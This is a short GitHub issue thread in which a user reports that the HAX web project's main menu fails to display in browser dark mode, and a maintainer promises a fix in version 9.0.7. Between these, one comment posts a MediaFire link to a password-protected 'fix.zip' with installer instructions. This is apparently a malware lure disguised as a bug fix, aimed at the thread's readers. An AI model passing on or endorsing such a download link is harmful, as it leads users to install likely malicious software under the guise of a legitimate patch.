### ISSUE TITLE
[bug] Main Menu fails to display w/ Dark mode enabled in Browser (Breakpoint?)

### ISSUE THREAD

**Issue by cgldevel** [haxtheweb/issues#2131]
Location: https://iam.hax.psu.edu/cgl109/
Browser: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
OS: macOS - 8GB RAM - 8 cores
Screen: 1512x982
Window size: 1458x760
Battery: 100%
Connection: 4g
Bug you experienced: I ran this by Bryan already to verify (Breakpoint issue) - See [image]
![Screenshot_20240826-102351](https://github.com/user-attachments/assets/d909157d-09c2-4cfe-aa33-d966c312c8ed)

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by btopro** [comment]
will be fixed in 9.0.7 which we'll hold off a few days to release in case anything else like this pops up. thanks for the report
